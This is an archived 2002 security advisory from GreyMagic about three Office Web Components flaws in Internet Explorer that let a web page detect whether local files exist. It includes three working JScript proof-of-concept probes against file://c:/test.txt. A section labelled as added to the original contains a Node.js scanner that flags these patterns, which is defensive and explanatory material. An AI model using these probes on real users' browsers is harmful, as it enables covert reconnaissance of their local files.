Multiple local files detection issues with OWC in IE (GM#008-IE)

From: GreyMagic Software (securityat_private)
Date: Mon Apr 08 2002 - 08:22:34 PDT


    GreyMagic Security Advisory GM#008-IE
    =====================================
    
    By GreyMagic Software, Israel.
    08 Apr 2002.
    
    Available in HTML format at http://security.greymagic.com/adv/gm008-ie/.
    
    Topic: Multiple local files detection issues with OWC in IE.
    
    Discovery date: 25 Feb 2002, 05 Mar 2002.
    
    Affected applications:
    ======================
    
    * Office 2000 - Office Web Components 9, Chart component.
    * Office XP - Office Web Components 10, Chart component.
    * Office XP - Office Web Components 10, Spreadsheet component.
    * Office XP - Office Web Components 10, DataSourceControl component.
    
    
    Introduction:
    =============
    
    Office Web Components (OWC) is a group of safe for scripting components used
    to enrich HTML documents with Spreadsheets, Charts, Pivot tables and more.
    
    OWC ships with the Microsoft Office package, but it is also downloadable as
    a separate (free for viewing only) component.
    
    
    Discussion:
    ===========
    
    There are several ways to check whether local files exist using OWC9 and
    OWC10.
    
    The first vulnerability is in the Chart component in both OWC9 and OWC10.
    The "Load" method does not perform any security check on the assigned URL
    and throws an error when the given file does not exist; if no error is
    thrown, the file exists.
    
    The second vulnerability is in the Spreadsheet component in OWC10. The
    "XMLURL" property blindly follows redirections, so it is possible to assign
    it a URL which redirects to a local file and determine whether it exists or
    not by the error thrown. It is also possible to read properly formatted
    WorkSheet XML files from disallowed locations in the same way.
    
    The third vulnerability is in the DataSourceControl component in OWC10. The
    "ConnectionFile" property does not perform any security checks on the
    assigned URL. Therefore, it is possible to assign a local file and determine
    whether it exists or not by the error thrown.
    
    
    Exploit:
    ========
    
    A simple exploit for the first vulnerability:
    
    <object id="oCS" classid="clsid:0002E500-0000-0000-C000-000000000046"
    style="display:none"></object>
    <!-- For OWC10 the clsid is "0002E556-0000-0000-C000-000000000046" -->
    <script language="jscript">
    onload=function () {
        try {
            oCS.Load("file://c:/test.txt");
            alert("File exists!");
        }
        catch (oErr) {
            alert("File does not exist.");
        }
    }
    </script>
    
    A simple exploit for the second vulnerability, "getFile.asp" internally
    redirects to "file://c:/test.txt":
    
    <object id="oSP" classid="clsid:0002E551-0000-0000-C000-000000000046"
    style="display:block"></object>
    <script language="jscript">
    onload=function () {
        try {
            oSP.XMLURL="getFile.asp";
        }
        catch (oErr) {
            alert(oErr.description.indexOf("valid path")==-1 ? "File exists!" :
    "File does not exist.");
        }
    }
    </script>
    
    A simple exploit for the third vulnerability:
    
    <object id="oDS" classid="clsid:0002E553-0000-0000-C000-000000000046"
    style="display:block"></object>
    <script language="jscript">
    onload=function () {
        try {
            oDS.ConnectionFile="file://c:/test.txt";
        }
        catch (oErr) {
            alert(oErr.number==-2146697211 ? "File does not exist." :
                  "File exists!");
        }
    }
    </script>
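    A defender-side complement to the three snippets above, added here as an
    example (it is not part of the advisory or of GreyMagic's demonstration
    page): a small Node.js scanner that flags HTML combining the OWC class IDs
    the advisory names with the Load, XMLURL and ConnectionFile sinks it
    describes. The CLSIDs are the advisory's own; the sample pages embedded in
    the script are constructed, modelled on the snippets above. Because the
    redirect variant of the second issue never shows a file: URL in the page,
    an OWC object paired with a sink that points at a non-file URL is reported
    as a lower-confidence hit rather than ignored.

```javascript
// Added example, not part of the GreyMagic advisory: a static scanner that
// flags HTML pages combining the OWC class IDs named in GM#008-IE with the
// method/property sinks the advisory describes (Chart.Load, Spreadsheet.XMLURL,
// DataSourceControl.ConnectionFile). Meant for a defender reviewing cached
// pages or proxy captures; the sample pages below are constructed.

// CLSIDs exactly as listed in the advisory.
const OWC_CLSIDS = {
  "0002E500-0000-0000-C000-000000000046": "OWC9 Chart",
  "0002E556-0000-0000-C000-000000000046": "OWC10 Chart",
  "0002E551-0000-0000-C000-000000000046": "OWC10 Spreadsheet",
  "0002E553-0000-0000-C000-000000000046": "OWC10 DataSourceControl",
};

// Sinks from the advisory. Each pattern is extended at scan time to capture
// the rest of the statement (up to ';') so the assigned URL can be inspected.
const SINKS = [
  { name: "Chart.Load", pattern: "\\.Load\\s*\\(" },
  { name: "Spreadsheet.XMLURL", pattern: "\\.XMLURL\\s*=" },
  { name: "DataSourceControl.ConnectionFile", pattern: "\\.ConnectionFile\\s*=" },
];

function scanHtml(html) {
  // 1. Collect <object> tags whose classid is one of the OWC components.
  const objects = [];
  const objRe = /<object\b[^>]*\bclassid\s*=\s*["']?clsid:([0-9a-f-]{36})/gi;
  let m;
  while ((m = objRe.exec(html)) !== null) {
    const clsid = m[1].toUpperCase();
    if (clsid in OWC_CLSIDS) objects.push({ clsid, component: OWC_CLSIDS[clsid] });
  }

  // 2. Find each sink and look at what is assigned or passed to it.
  const sinks = [];
  for (const sink of SINKS) {
    const re = new RegExp(sink.pattern + "([^;]*)", "gi");
    while ((m = re.exec(html)) !== null) {
      // A literal file: URL is the direct probe shown in exploits 1 and 3.
      // The redirect variant (exploit 2) hides the target server-side, so an
      // OWC object plus a sink with a non-file URL is still worth a look.
      const localFile = /\bfile:/i.test(m[1]);
      const severity = localFile ? "high" : objects.length > 0 ? "medium" : "low";
      sinks.push({ sink: sink.name, localFile, severity });
    }
  }

  return { objects, sinks, suspicious: objects.length > 0 && sinks.length > 0 };
}

// Constructed sample pages (not taken from any real site), modelled on the
// advisory's snippets, plus a page that uses no OWC control at all.
const SAMPLES = {
  chartProbe: `<object id="oCS" classid="clsid:0002E500-0000-0000-C000-000000000046" style="display:none"></object>
<script language="jscript">
onload=function(){ try { oCS.Load("file://c:/test.txt"); } catch (e) {} }
</script>`,
  spreadsheetRedirect: `<object id="oSP" classid="clsid:0002E551-0000-0000-C000-000000000046"></object>
<script language="jscript">onload=function(){ try { oSP.XMLURL="getFile.asp"; } catch (e) {} }</script>`,
  benign: `<p>Quarterly report</p><img src="chart.png">`,
};

// Stand-alone run: print the verdict for each constructed sample.
for (const [name, html] of Object.entries(SAMPLES)) {
  console.log(name, JSON.stringify(scanHtml(html)));
}
```

    Running the script with node prints one JSON verdict per sample; the chart
    probe is rated "high" because the Load argument is a file: URL, the
    redirect page is rated "medium" (OWC spreadsheet present, target hidden
    behind getFile.asp), and the benign page is not flagged at all.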
    
    
    Solution:
    =========
    
    In Internet Explorer's security zone settings, set "Run ActiveX controls
    and plug-ins" to "Disable", or simply remove/disable OWC until a patch
    becomes available.
    
    Microsoft has been informed and has opened an investigation into these
    issues.
    
    
    Tested on:
    ==========
    
    IE5sp2 NT4 sp6a + Office 2000 (OWC9), all patches.
    IE5.5sp2 NT4 sp6a + Office 2000 (OWC9), all patches.
    IE5.5sp2 NT4 sp6a + OWC10, all patches.
    IE6 Win2000 + Office 2000 (OWC9), all patches.
    IE6 WinXP + Office XP (OWC10), all patches.
    
    
    Demonstration:
    ==============
    
    A fully dynamic proof-of-concept demonstration of these issues is available
    at http://security.greymagic.com/adv/gm008-ie/.
    
    
    Feedback:
    =========
    
    Please mail any questions or comments to securityat_private
    
    - Copyright © 2002 GreyMagic Software.
    
    This archive was generated by hypermail 2b30 : Mon Apr 08 2002 - 17:19:03 PDT